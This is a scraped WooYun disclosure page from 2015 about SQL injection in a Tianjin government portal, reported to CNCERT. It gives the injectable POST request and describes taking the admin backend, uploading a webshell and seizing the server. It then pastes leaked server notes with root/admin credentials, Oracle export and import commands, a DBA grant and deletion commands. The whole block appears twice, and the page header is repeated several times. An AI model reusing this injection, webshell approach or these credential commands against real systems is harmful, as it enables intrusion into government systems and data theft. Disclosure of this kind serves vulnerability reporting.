天津政务网某处SQL注入一枚 | wooyun-2015-0132598| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0132598

漏洞标题：天津政务网某处SQL注入一枚

漏洞作者： Coeus

提交时间：2015-08-14 21:35

修复时间：2015-09-28 10:48

公开时间：2015-09-28 10:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-14：细节已通知厂商并且等待厂商处理中
2015-08-14： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-08-24：细节向核心白帽子及相关领域专家公开
2015-09-03：细节向普通白帽子公开
2015-09-13：细节向实习白帽子公开
2015-09-28：细节向公众公开

简要描述：

详细说明：

注入点：

**.**.**.**:80/search/advanced_search.do (POST)
q=justtest*&Submit2=%B8%DF%BC%B6%CB%D1%CB%F7&d=sx&wbj=&areaId=0&sortId=0&subsortId=0&levelId=0&noResult=y

管理员信息：

通过数据库，拿下后台：

海量企业信息：

上传shell，拿下服务器：

服务器：

3340端口远程桌面
敏感信息：

电子政务SUN服务器 **.**.**.** 用户名密码 admin  root用户名密码 root 
电子政务SUN服务器 **.**.**.** 用户名密码 admin  root用户名密码 root 
然后 su – root
先运行Bash 然后进入 /tomcat/bin 执行./shutdown.sh  tjeg存放在/oradata/tjeg
更改字符集 export LANG=zh_CN.GBK (需要bash之后才行~!!!!!)
LANG=en_US.UTF-8
export LANG
chmod +x startup.sh  //给文件授权
chmod +x setenv.sh(权限)
 
tomcat startup.sh &
命令行启动监听 lsnrctl start
exp tjeg/tjeg@tjeg file=c:\crimsonlogic.dmp
imp tjeg/tjeg@tjeg file=c:\crimsonlogic.dmp fromuser=tjeg
commit=y ignore=y
 lsnrctl strart (启动监听)
 sqlplus / as sysdba (直接进入本机的用户)
mv upload  /export/home/admin/tjeg2
mv tjeg2 /oradata   (/export/home/admin)上传到这里~!!
reboot
rm -rf tjeg2　
　　　　　 
netstat -an|grep 80 查看80端口
kill -9 17986  消灭某一进程
ps -ef | grep java 查看进程
JAVA_OPTS='-Xms512m -Xmx1024m -XX:PermSize=128m -XX:MaxPermSize=512m'
export JAVA_OPTS  Tomcat虚拟机
创建表空间
CREATE TABLESPACE TJEGC DATAFILE '/oradata/u01/app/oracle/oradata/zwzxdb1/TJEGC.dbf' SIZE 500M autoextend on next 10m maxsize unlimited;
创建用户
create user tjegc identified by "tjegc" default tablespace TJEGC temporary tablespace TEMP profile DEFAULT;
grant connect to tjegc;
grant dba to tjegc;
grant create table to tjegc;
grant global query rewrite to tjegc;
grant select any table to tjegc;
grant unlimited tablespace to tjegc;
imp tjegc/tjegc file=/export/home/admin/09-3-24SL.dmp fromuser=tjegc
imp tjeg/tjeg file=/export/home/admin/09-3-24SL.dmp fromuser=tjeg touser=tjegc
ignort=y//注在有数据情况下加

可内网：

漏洞证明：

注入点：

**.**.**.**:80/search/advanced_search.do (POST)
q=justtest*&Submit2=%B8%DF%BC%B6%CB%D1%CB%F7&d=sx&wbj=&areaId=0&sortId=0&subsortId=0&levelId=0&noResult=y

管理员信息：

通过数据库，拿下后台：

海量企业信息：

上传shell，拿下服务器：

服务器：

3340端口远程桌面
敏感信息：

电子政务SUN服务器 **.**.**.** 用户名密码 admin  root用户名密码 root 
电子政务SUN服务器 **.**.**.** 用户名密码 admin  root用户名密码 root 
然后 su – root
先运行Bash 然后进入 /tomcat/bin 执行./shutdown.sh  tjeg存放在/oradata/tjeg
更改字符集 export LANG=zh_CN.GBK (需要bash之后才行~!!!!!)
LANG=en_US.UTF-8
export LANG
chmod +x startup.sh  //给文件授权
chmod +x setenv.sh(权限)
 
tomcat startup.sh &
命令行启动监听 lsnrctl start
exp tjeg/tjeg@tjeg file=c:\crimsonlogic.dmp
imp tjeg/tjeg@tjeg file=c:\crimsonlogic.dmp fromuser=tjeg
commit=y ignore=y
 lsnrctl strart (启动监听)
 sqlplus / as sysdba (直接进入本机的用户)
mv upload  /export/home/admin/tjeg2
mv tjeg2 /oradata   (/export/home/admin)上传到这里~!!
reboot
rm -rf tjeg2　
　　　　　 
netstat -an|grep 80 查看80端口
kill -9 17986  消灭某一进程
ps -ef | grep java 查看进程
JAVA_OPTS='-Xms512m -Xmx1024m -XX:PermSize=128m -XX:MaxPermSize=512m'
export JAVA_OPTS  Tomcat虚拟机
创建表空间
CREATE TABLESPACE TJEGC DATAFILE '/oradata/u01/app/oracle/oradata/zwzxdb1/TJEGC.dbf' SIZE 500M autoextend on next 10m maxsize unlimited;
创建用户
create user tjegc identified by "tjegc" default tablespace TJEGC temporary tablespace TEMP profile DEFAULT;
grant connect to tjegc;
grant dba to tjegc;
grant create table to tjegc;
grant global query rewrite to tjegc;
grant select any table to tjegc;
grant unlimited tablespace to tjegc;
imp tjegc/tjegc file=/export/home/admin/09-3-24SL.dmp fromuser=tjegc
imp tjeg/tjeg file=/export/home/admin/09-3-24SL.dmp fromuser=tjeg touser=tjegc
ignort=y//注在有数据情况下加

可内网：

修复方案：

改进网站。

版权声明：转载请注明来源 Coeus@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-08-14 10:48

厂商回复：

CNVD确认所述情况，已经转由CNCERT下发给相应分中心分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0132598

漏洞标题：天津政务网某处SQL注入一枚

相关厂商：cncert国家互联网应急中心

漏洞作者： Coeus

提交时间：2015-08-14 21:35

修复时间：2015-09-28 10:48

公开时间：2015-09-28 10:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Coeus@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0132598

漏洞标题：天津政务网某处SQL注入一枚

相关厂商：cncert国家互联网应急中心

漏洞作者： Coeus

提交时间：2015-08-14 21:35

修复时间：2015-09-28 10:48

公开时间：2015-09-28 10:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0132598"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Coeus@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：